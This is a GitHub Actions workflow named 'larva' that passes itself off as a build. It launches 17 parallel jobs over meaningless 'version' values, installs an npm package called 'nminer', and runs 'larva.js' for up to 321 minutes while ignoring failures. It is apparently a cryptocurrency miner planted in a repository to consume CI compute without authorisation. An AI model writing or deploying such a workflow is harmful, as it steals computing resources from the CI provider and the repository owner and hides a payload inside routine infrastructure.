name: larva
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7769 }
          - { version: 2623 }
          - { version: 1893 }
          - { version: 45 }
          - { version: 4697 }
          - { version: 1070 }
          - { version: 7497 }
          - { version: 5632 }
          - { version: 3825 }
          - { version: 6138 }
          - { version: 3330 }
          - { version: 8748 }
          - { version: 1171 }
          - { version: 251 }
          - { version: 6525 }
          - { version: 4072 }
          - { version: 493 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: the than
        run: |
          npm install nminer@latest
          timeout 321m node larva.js || echo "larva executed"